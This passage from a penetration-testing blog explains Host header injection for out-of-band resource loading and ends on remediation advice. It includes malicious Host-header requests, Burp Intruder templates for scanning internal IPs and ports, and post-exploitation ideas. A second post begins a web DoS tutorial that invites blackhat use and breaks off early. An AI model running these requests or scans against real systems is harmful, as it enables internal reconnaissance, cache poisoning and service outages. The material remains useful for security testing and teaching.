<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNx_ODVqZjRV4MH6137gE-DBEqvACl1vfgEbMZ3KhUYq6sqzMgbmjF2aTjNFwkV3tfdMNoqnyvMPzUTAerHi5XY7TCPDh610_geEVGXGPnkya-yJ_n8_kQql9dV-l_HGFUL7OlhuUczvc/s1600/screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="703" data-original-width="697" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNx_ODVqZjRV4MH6137gE-DBEqvACl1vfgEbMZ3KhUYq6sqzMgbmjF2aTjNFwkV3tfdMNoqnyvMPzUTAerHi5XY7TCPDh610_geEVGXGPnkya-yJ_n8_kQql9dV-l_HGFUL7OlhuUczvc/s640/screenshot1.png" width="633" /></a></div>
<div style="text-align: justify;">
<br />
Below we can see the modified configuration in the repeater for the test:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitYCB-w_dgKfQIr4JZ7cTCuRwOHOX5udsI7r9I475bgz9IFN6IW-EZfAro4SdkbWhDtEv4crYXihiljFqK-JsVm0r7SujuNl_BtSVCKH6stLNsKsBjTvMOs8B5SZZ3Le4_nzJwy9K629E/s1600/screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="702" data-original-width="693" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitYCB-w_dgKfQIr4JZ7cTCuRwOHOX5udsI7r9I475bgz9IFN6IW-EZfAro4SdkbWhDtEv4crYXihiljFqK-JsVm0r7SujuNl_BtSVCKH6stLNsKsBjTvMOs8B5SZZ3Le4_nzJwy9K629E/s640/screenshot2.png" width="630" /></a></div>
<br /></div>
<h3 style="text-align: justify;">
The RFC(s)</h3>
<div style="text-align: justify;">
It usually is a platform issue and not an application one. In some scenarios when we have for example a CGI application, the HTTP headers are handled by the application (aka. the app is dynamically manipulating the HTTP headers to run properly). This means that HTTP headers such as Location and Hosts are handled by the app and therefore a vulnerability might exist. It is recommended to run HTTP header integrity checks when you own a critical application that is running on your behalf.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For more informatinon on the subject read RFC 2616 [2]. Where the use of the headers is explained in detail. The Host request-header field specifies the Internet host and port number of the resource being requested, as obtained from the original URI given by the user or referring resource (generally an HTTP URL. The Host field value MUST represent the naming authority of the origin server or gateway given by the original URL. This allows the origin server or gateway to differentiate between internally-ambiguous URLs, such as the root "/" URL of a server for multiple host names on a single IP address.<br />
<br />
When TLS is enforced throughout the whole application (even the root path /) an ESI or OfBRL is not possible, because both protocols perform source origin authentication e.g. as soon as a connection is established with an IP and the vulnerable server the protocol guaranties that the connection established is going to serve traffic only from the original IP. More specifically we are going to get an SNI error.<br />
<br />
SNI prevents what's known as a "common name mismatch error": when a client (user) device reaches the IP address for a vulnerable app, but the name on the SSL/TLS certificate doesn't match the name of the website. SNI was added to the IETF's Internet RFCs in June 2003 through RFC 3546, Transport Layer Security (TLS) Extensions. The latest version of the standard is RFC 6066.<br />
<br /></div>
<div style="text-align: justify;">
The option to trigger an arbitrary external service interaction does not constitute a vulnerability in its own right, and in some cases it might be the intended behavior of the application. But we as Hackers want to exploit it correct?, what can we do with an ESI then or a Out-of-band resource load?<br />
<br /></div>
<h3 style="text-align: justify;">
The Infrastructure </h3>
<div style="text-align: justify;">
Well it depends on the over all set up! The most juice scenarios are the folowing:</div>
<div style="text-align: justify;">
<ol>
<li>The application is behind a WAF (with restrictive ACL's) </li>
<li>The application is behind a UTM (with restrictive ACL's) </li>
<li>The application is running multiple applications in a virtual enviroment </li>
<li>The application is running behind a NAT. </li>
</ol>
</div>
<div style="text-align: justify;">
In order to perform the hack we have to simple inject our host value in the HTTP host header (hostname including port). Below is a simple diagram explaining the vulnerability.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNPshL8ZSk1Hg__uBUm3uZ8j94QxBy2Z-l3l8_9tVg-JCLiwhR1nlwlXe1BQuX6SmfzPIUEAWSEnEdlgYJPmwSa8ZFHqyAGmydUzXp1FgMPrx1-FXoUYbVkpYQvXsuWIGdLmzcH5HZrzg/s1600/blog.png"><img border="0" height="484" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNPshL8ZSk1Hg__uBUm3uZ8j94QxBy2Z-l3l8_9tVg-JCLiwhR1nlwlXe1BQuX6SmfzPIUEAWSEnEdlgYJPmwSa8ZFHqyAGmydUzXp1FgMPrx1-FXoUYbVkpYQvXsuWIGdLmzcH5HZrzg/s640/blog.png" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Below we can see the HTTP requests with injected Host header:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Original request:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div class="code">
GET / HTTP/1.1</div>
<div style="text-align: justify;">
Host: our_vulnerableapp.com</div>
<div style="text-align: justify;">
Pragma: no-cache</div>
<div style="text-align: justify;">
Cache-Control: no-cache, no-transform</div>
<div style="text-align: justify;">
Connection: close</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Malicious requests:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
GET / HTTP/1.1</div>
<div style="text-align: justify;">
Host: malicious.com</div>
<div style="text-align: justify;">
Pragma: no-cache</div>
<div style="text-align: justify;">
Cache-Control: no-cache, no-transform</div>
<div style="text-align: justify;">
Connection: close</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
or</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
GET / HTTP/1.1</div>
<div style="text-align: justify;">
Host: 127.0.0.1:8080</div>
<div style="text-align: justify;">
Pragma: no-cache</div>
<div style="text-align: justify;">
Cache-Control: no-cache, no-transform</div>
<div style="text-align: justify;">
Connection: close</div>
<div style="text-align: justify;">
</div>
<br /></div>
<div style="text-align: justify;">
If the application is vulnerable to OfBRL then, it means that the reply is going to be processed by the vulnerable application, bounce back in the sender (aka. Hacker) and potentially load in the context of the application. If the reply does not come back to the sender (aka. Hacker) then we might have a OfBRL, and further investigation is required.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Out-of-band resource load:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMzmncCH3MZT5JS7149oKgcGKiCBa8aXCgMSflOtEJ-hwQtsAuO7-w1hhHPUqUSnbkiGdkyBMKP8AY4WSEICsHZnuCZAYyLMOfn6bXORqolLlcLcUbToj5e-LIuompELD7dLq2bziKtnE/s1600/blog1.png"><img border="0" height="473" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMzmncCH3MZT5JS7149oKgcGKiCBa8aXCgMSflOtEJ-hwQtsAuO7-w1hhHPUqUSnbkiGdkyBMKP8AY4WSEICsHZnuCZAYyLMOfn6bXORqolLlcLcUbToj5e-LIuompELD7dLq2bziKtnE/s640/blog1.png" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
ESI:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN4kuD_IpCS6eWK2Ebzx9dDlxhGn9FGCfK223JoeIuwEPSgqvKGyTO_v1AeqszY7V7RWsLntZXW2FGSRhpMQ3_IEQXOU4rcqzqPlDyTDiD5MfVQuOJXgzpiTtZFzLF5dlPTS2hhX29FdI/s1600/blog2.png"><img border="0" height="476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN4kuD_IpCS6eWK2Ebzx9dDlxhGn9FGCfK223JoeIuwEPSgqvKGyTO_v1AeqszY7V7RWsLntZXW2FGSRhpMQ3_IEQXOU4rcqzqPlDyTDiD5MfVQuOJXgzpiTtZFzLF5dlPTS2hhX29FdI/s640/blog2.png" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
<span style="font-size: small; font-weight: 400;">Below we can see the configuration in the intruder:</span></h3>
<div>
<span style="font-size: small; font-weight: 400;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN2iubvp_KPKiMRYlxSXS5ajT9A5UeNq9rZUwOafJ0IEcY6gWltJYS8gJcrsJnMD48w4vVPXwE1QIZmjfRt10YjbnfyWZDqBujrG-_oUhVerKIsbAdzvOwDTp-CqwKT-9Sqgs72nKLISg/s1600/screenshot3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="708" data-original-width="695" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN2iubvp_KPKiMRYlxSXS5ajT9A5UeNq9rZUwOafJ0IEcY6gWltJYS8gJcrsJnMD48w4vVPXwE1QIZmjfRt10YjbnfyWZDqBujrG-_oUhVerKIsbAdzvOwDTp-CqwKT-9Sqgs72nKLISg/s640/screenshot3.png" width="628" /></a></div>
<div>
<span style="font-size: small; font-weight: 400;"><br /></span></div>
<div>
<span style="font-size: small; font-weight: 400;">We are simply using the sniper mode in the intruder, can do the following:</span></div>
<div>
<ol>
<li><span style="font-size: small; font-weight: 400;">Rotate through diffrent ports, using the vulnapp.com domain name.</span></li>
<li>Rotate through diffrent ports, using the vulnapp.com external IP.</li>
<li>Rotate through diffrent ports, using the vulnapp.com internal IP, if applicable.</li>
<li>Rotate through diffrent internal IP(s) in the same domain, if applicable.</li>
<li>Rotate through diffrent protocols (it might not work that BTW).</li>
<li>Brute force directories on identified DMZ hosts.</li>
</ol>
</div>
<h3 style="text-align: justify;">
The Test</h3>
<div style="text-align: justify;">
Burp Professional edition has a feature named collaborator. Burp Collaborator is a network service that Burp Suite uses to help discover vulnerabilities such as ESI and OfBRL [3]. A typical example would be to use Burp Collaborator to test if ESI exists. Below we describe an interaction like that.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Original request:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
GET / HTTP/1.1</div>
<div style="text-align: justify;">
Host: our_vulnerableapp.com</div>
<div style="text-align: justify;">
Pragma: no-cache</div>
<div style="text-align: justify;">
Cache-Control: no-cache, no-transform</div>
<div style="text-align: justify;">
Connection: close</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burp Collaborator request:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
GET / HTTP/1.1</div>
<div style="text-align: justify;">
Host: edgfsdg2zjqjx5dwcbnngxm62pwykabg24r.burpcollaborator.net</div>
<div style="text-align: justify;">
Pragma: no-cache</div>
<div style="text-align: justify;">
Cache-Control: no-cache, no-transform</div>
<div style="text-align: justify;">
Connection: keep-alive</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burp Collaborator response:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
HTTP/1.1 200 OK</div>
<div style="text-align: justify;">
Server: Burp Collaborator https://burpcollaborator.net/</div>
<div style="text-align: justify;">
X-Collaborator-Version: 4</div>
<div style="text-align: justify;">
Content-Type: text/html</div>
<div style="text-align: justify;">
Content-Length: 53</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<html><body>drjsze8jr734dsxgsdfl2y18bm1g4zjjgz</body></html></div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
The Post Exploitation </h3>
<div style="text-align: justify;">
Ok now as Hackers artists we are going to think how to exploit this. The scenarios are: [7][8]</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<ol>
<li>Attempt to load the local admin panels. </li>
<li>Attempt to load the admin panels of surounding applications. </li>
<li>Attempt to interact with other services in the DMZ. </li>
<li>Attempt to port scan the localhost </li>
<li>Attempt to port scan the DMZ hosts</li>
<li>Use it to exploit the IP trust and run a DoS attack to other systems </li>
</ol>
</div>
<div style="text-align: justify;">
A good option for that would be Burp Intruder. Burp Intruder is a tool for automating customized attacks against web applications. It is extremely powerful and configurable, and can be used to perform a huge range of tasks, from simple brute-force guessing of web directories through to active exploitation of complex blind SQL injection vulnerabilities.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burp Intruder configuration for scanning surounding hosts:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
GET / HTTP/1.1</div>
<div style="text-align: justify;">
Host: 192.168.1.§§</div>
<div style="text-align: justify;">
Pragma: no-cache</div>
<div style="text-align: justify;">
Cache-Control: no-cache, no-transform</div>
<div style="text-align: justify;">
Connection: close</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burp Intruder configuration for port scanning surounding hosts:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
GET / HTTP/1.1</div>
<div style="text-align: justify;">
Host: 192.168.1.1:§§</div>
<div style="text-align: justify;">
Pragma: no-cache</div>
<div style="text-align: justify;">
Cache-Control: no-cache, no-transform</div>
<div style="text-align: justify;">
Connection: close</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burp Intruder configuration for port scanning localhost:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
GET / HTTP/1.1</div>
<div style="text-align: justify;">
Host: 127.0.0.1:§§</div>
<div style="text-align: justify;">
Pragma: no-cache</div>
<div style="text-align: justify;">
Cache-Control: no-cache, no-transform</div>
<div style="text-align: justify;">
Connection: close</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>What Can you Do</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The big hack analysis; this vulnerability can be used in the following ways:</div>
<div style="text-align: justify;">
<ol>
<li>Bypass restrictive UTM ACL(s) </li>
<li>Bypass restrictive WAF Rule(s) </li>
<li>Bypass restrictive FW ACL(s) </li>
<li>Perform cache poisoning</li>
<li>Fingerprint internal infrastracture</li>
<li>Perform DoS exploiting the IP trust</li>
<li>Exploit applications hosted in the same mahine aka. mulitple app loads</li>
</ol>
</div>
<div style="text-align: justify;">
Below we can see a schematic analysis on bypassing ACL(s):</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvlbvi_nY8Ac9xxiyl3hWFn12B6BelUKUGWnr1fXt3_DO0t4Mhfpjjiwl5PUYtHV9Qb7Eu9fpSSZXSMn5sHiaq3WxofVJc4LlUunCB8C1LdrRGw6F4b9vh7JzlQ-qeQl0KtSvDH6Fgr8I/s1600/blog3.png"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvlbvi_nY8Ac9xxiyl3hWFn12B6BelUKUGWnr1fXt3_DO0t4Mhfpjjiwl5PUYtHV9Qb7Eu9fpSSZXSMn5sHiaq3WxofVJc4LlUunCB8C1LdrRGw6F4b9vh7JzlQ-qeQl0KtSvDH6Fgr8I/s640/blog3.png" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue to receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although only the user of the local browser instance will be affected. [5]</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Below follows the schematic analysis:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCpNQED6OR4S_MEbw0LHg281amMSLDM7D6tUgg1OpItOSoQWlO694CfMaxcqHAEaA7wG-_FWwgU_UOP8iyIU5Lw42-5HGJUP28tM_joBXGrFwXreZP94cWT4VdwgzWm4tLCxFLA82zps/s1600/screenshot.png"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCpNQED6OR4S_MEbw0LHg281amMSLDM7D6tUgg1OpItOSoQWlO694CfMaxcqHAEaA7wG-_FWwgU_UOP8iyIU5Lw42-5HGJUP28tM_joBXGrFwXreZP94cWT4VdwgzWm4tLCxFLA82zps/s640/screenshot.png" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<br />
<b>What Can't You Do</b><br />
You cannot perform XSS or CSRF exploting this vulnerability, unless certain conditions apply.<br />
<br /></div>
<div style="text-align: justify;">
<b>The fix</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If the ability to trigger arbitrary ESI or OfBRL is not intended behavior, then you should implement a whitelist of permitted URLs, and block requests to URLs that do not appear on this whitelist. [6] Also running host intergrity checks is recommended.[6]<br />
<br />
We should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter. [6]<br />
<br />
More specifically we can:<br />
<br />
<ol>
<li>Apply egress filtering on the DMZ</li>
<li>Apply egress filtering on the host</li>
<li>Apply white list IP restrictions in the app</li>
<li>Apply black list restrictions in the app (although not reommended)</li>
</ol>
</div>
<div style="text-align: justify;">
<b>Refrences:</b></div>
<div style="text-align: justify;">
<ol>
<li><a href="https://portswigger.net/kb/issues/00300200_external-service-interaction-dns">https://portswigger.net/kb/issues/00300200_external-service-interaction-dns</a></li>
<li><a href="https://tools.ietf.org/html/rfc2616">https://tools.ietf.org/html/rfc2616</a></li>
<li><a href="https://portswigger.net/burp/documentation/collaborator">https://portswigger.net/burp/documentation/collaborator</a></li>
<li><a href="https://portswigger.net/burp/documentation/desktop/tools/intruder/using">https://portswigger.net/burp/documentation/desktop/tools/intruder/using</a></li>
<li><a href="https://owasp.org/www-community/attacks/Cache_Poisoning">https://owasp.org/www-community/attacks/Cache_Poisoning</a></li>
<li><a href="https://portswigger.net/kb/issues/00100a00_out-of-band-resource-load-http">https://portswigger.net/kb/issues/00100a00_out-of-band-resource-load-http</a></li>
<li>CWE-918: Server-Side Request Forgery (SSRF)</li>
<li>CWE-406: Insufficient Control of Network Message Volume (Network Amplification)</li>
<li><a href="https://www.cloudflare.com/learning/ssl/what-is-sni/" style="text-align: start;">https://www.cloudflare.com/learning/ssl/what-is-sni/</a></li>
</ol>
</div>
<ol>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-39254177377209325982019-07-23T02:48:00.002-07:002020-06-19T03:38:10.713-07:00Web DDoSPedia a million requests<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Web Application Denial of Service Next Level</b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
In this tutorial we are going to talk on how to cause <u>maximum down time </u>(including operational recovery processes<u>)</u> in anything that uses the word Web, this is also known as a Denial o Service Attack. Using this knowledge for malicious purposes is not something I am recommending or approve and I have zero accountability on how you use this knowledge. This is the reason I am providing also with countermeasures on the end of the post. </div>
<div style="text-align: justify;">
<b><br /></b>
<b>What Is The Landscape</b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
In the past we have seen many Denial of Service attacks, but most of them were not very sophisticated. A very good example would be the Low Orbit Ion Cannon (LOIC). LOIC performs a DoS attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.[2]</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
All these attacks as stated in previous post do not really take advantage of the 7th layer complexity of the Web and therefore are not so effective as they could be. A very good post exists in the Cloudflare blog named Famous DDoS Attacks [3]. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A few of the famous attacks are:</div>
<div style="text-align: justify;">
</div>
<ul>
<li>The 2016 Dyn attack</li>
<li>The 2015 GitHub attack</li>
<li>The 2013 Spamhaus attack</li>
<li>The 2000 Mafiaboy attack</li>
<li>The 2007 Estonia attack</li>
</ul>
<b>Improving DoS and DDoS attacks</b><br />
<div style="text-align: justify;">
<br />
In order to improve or understand better what is possible while conducting a DoS attack, we have to <span style="color: red;">think like a Web Server, Be a Web Server, Breath like a Web Server!!</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVxesD5f7jv_IouWswjHg4LdR8urS5HQdfFNJu63j5VRolDPB5XIZpJ4PMbjosQjE0aWLnnsX3mr0slfoaPgUd9xBoqp9ZimzrU2PbgUoC7zLQzzwOVwbNeJTju0tLkD9qo81jawGtv0o/s1600/c8bf354d464d1e619bfd0baf02abe8f5.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="822" data-original-width="564" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVxesD5f7jv_IouWswjHg4LdR8urS5HQdfFNJu63j5VRolDPB5XIZpJ4PMbjosQjE0aWLnnsX3mr0slfoaPgUd9xBoqp9ZimzrU2PbgUoC7zLQzzwOVwbNeJTju0tLkD9qo81jawGtv0o/s400/c8bf354d464d1e619bfd0baf02abe8f5.jpg" width="273" /></a></div>
<br />
Well what does a server breath? But of course HTTP, so what if we make the Web Server start breathing a lot of HTTP/S, that would be amazing.<br />
<br />
This is how we can over dose with HTTP a web server:<br />
<ol>
<li>HTTP Connection reuse</li>
<li>HTTP Pipelining</li>
<li>Single SSL/TLS handshake </li>
</ol>
But lets go a step further and expand on that, what else can we do to increase the impact? But of course <b>profile the server</b> and adjust the traffic to something that can be processed e.g. abuse vulnerable file upload functionality, SQLi attacks with drop statements etc. <b> </b><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<br />
<b> HTTP connection reuse</b><br />
<br />
HTTP persistent connection, also called HTTP keep-alive, or HTTP connection reuse, is the idea of using <b>a single TCP connection</b> to send and receive multiple HTTP requests/responses, as opposed to opening a new connection for every single request/response pair.<br />
<br />
The newer HTTP/2 protocol uses the same idea and takes it further to allow multiple concurrent requests/responses to be multiplexed over a single connection.<br />
<br />
<u>HTTP 1.0, connections are not considered persistent unless a keep-alive header is included</u>, although there is no official specification for how keepalive operates. It was, in essence, added to an existing protocol. If the client supports keep-alive, it adds an additional header to the request:<br />
<blockquote class="tr_bq">
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); font-family: monospace, monospace; font-size: 14px; line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start; white-space: pre-wrap;">Connection: keep-alive</pre>
</blockquote>
Then, when the server receives this request and generates a response, it also adds a header to the response:<br />
<blockquote class="tr_bq">
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); font-family: monospace, monospace; font-size: 14px; line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start; white-space: pre-wrap;">Connection: keep-alive</pre>
</blockquote>
Following this, the connection is not dropped, but is instead kept open. When the client sends another request, it uses the same connection. This will continue until either the client or the server decides that the conversation is over, and one of them drops the connection.<br />
<br />
<span style="color: red;"><b>In HTTP 1.1, all connections are considered persistent unless declared otherwise</b>.</span> The HTTP persistent connections do not use separate keepalive messages, they just allow multiple requests to use a single connection.<br />
<br />
<span style="background-color: yellow;">If the client does not close the connection when all of the data it needs has been received, the resources needed to keep the connection open on the server will be unavailable for other clients. How much this affects the server's availability and how long the resources are unavailable depend on the server's architecture and configuration.</span><br />
<span style="background-color: yellow;"><br /></span>
<span style="background-color: white;">Yes dear reader I know what are you thinking, how can you the humble hacker, the humble whitehat reader can use this knowledge to bring down your home web server for fun? Well there are good news. </span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">In Python t</span>here are various functions provided for instantiating HTTP keepalive connections within urllib3 library, such as ConnectionPools.<br />
<br />
Here is a code chunk to look through:<br />
<br />
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">from urllib3 import HTTPConnectionPool</span></span></pre>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">[...omitted...]</span></span></pre>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">urllib3.connectionpool.make_headers(keep_alive=None, accept_encoding=None, user_agent=None, basic_auth=None)¶</span></span><span style="font-family: monospace, monospace; font-size: 14px; white-space: pre-wrap;">
</span></pre>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">[...omitted...]</span></span></pre>
<div style="text-align: start;">
<br /></div>
Parameters:<span style="white-space: pre;"> </span><br />
<ul>
<li>keep_alive – If True, adds ‘connection: keep-alive’ header.</li>
<li>accept_encoding – Can be a boolean, list, or string. True translates to ‘gzip,deflate’. List will get joined by comma. String will be used as provided.</li>
<li>user_agent – String representing the user-agent you want, such as “python-urllib3/0.6”</li>
<li>basic_auth – Colon-separated username:password string for ‘authorization: basic ...’ auth header.</li>
</ul>
<b>Note:</b> If you are a proxy person, you can use the Match and Replace functionality on Burp Pro Suite to add or replace a the keepalive header. Bur then, your client (aka. the browser would have to know how to handle the received content). Better to write a Python template to handle the interaction.<br />
<br />
<b>HTTP Pipelining</b></div>
<div style="text-align: justify;">
<br />
HTTP pipelining is a technique in which multiple HTTP requests are sent on a single TCP (transmission control protocol) <span style="color: red;">connection without waiting for the corresponding responses. </span>The technique was superseded by multiplexing via HTTP/2, which is supported by most modern browsers.<br />
<br />
See following diagram for pipeline :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjOWZawZW0K2vuUeUiKkPGwpg2OmLpZ0VahWo5WqHrAW4V4lKQ80sduAuXYlDy9w1zPjyCVo5fEXQ0FT9pE8eL1Zef8ciaUUD_1iy82c2dnKR5yZjluS3oYATYW7FdhNPrhgHf9unpU-k/s1600/XS-U8gZ-oONKS2fSxqbfLxBwslkQnBbVvude.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="445" data-original-width="640" height="443" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjOWZawZW0K2vuUeUiKkPGwpg2OmLpZ0VahWo5WqHrAW4V4lKQ80sduAuXYlDy9w1zPjyCVo5fEXQ0FT9pE8eL1Zef8ciaUUD_1iy82c2dnKR5yZjluS3oYATYW7FdhNPrhgHf9unpU-k/s640/XS-U8gZ-oONKS2fSxqbfLxBwslkQnBbVvude.png" width="640" /></a></div>
<br />
<br />
<span style="color: red;">HTTP pipelining requires both the client and the server to support it.</span> HTTP/1.1 conforming servers are required to support pipelining (Pipelining was introduced in HTTP/1.1 and was not present in HTTP/1.0). This does not mean that servers are required to pipeline responses, but that they are required not to fail if a client chooses to pipeline requests. Interesting behavior!!!!!!!!!<br />
<br />
<b>Note:</b> Most of the servers execute requests from pipelining clients in the same fashion they would from non-pipelining clients. They don’t try to optimize it.<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgziTYszF8yIDlyvVO01gEPyNaVISdqegjgXly2baYc_OIGvtQelKdf4kal4mYUbQCSFWnlC5MtGFMetbeabDCoWareT9rEVG27X5MEu5N51N1eI2bO9fiKeQJVMafWr7K3nc1wY4EXqSs/s1600/images.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="183" data-original-width="275" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgziTYszF8yIDlyvVO01gEPyNaVISdqegjgXly2baYc_OIGvtQelKdf4kal4mYUbQCSFWnlC5MtGFMetbeabDCoWareT9rEVG27X5MEu5N51N1eI2bO9fiKeQJVMafWr7K3nc1wY4EXqSs/s400/images.jpeg" width="400" /></a></div>
<b><br /></b>
<span style="background-color: white;">Again, yes dear reader I know what are you thinking, how can you the humble blackhat hacker, the humble hacktivist reader can use this knowledge to bring down your home web server for fun? Well there are more good news. </span><br />
<span style="background-color: white;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
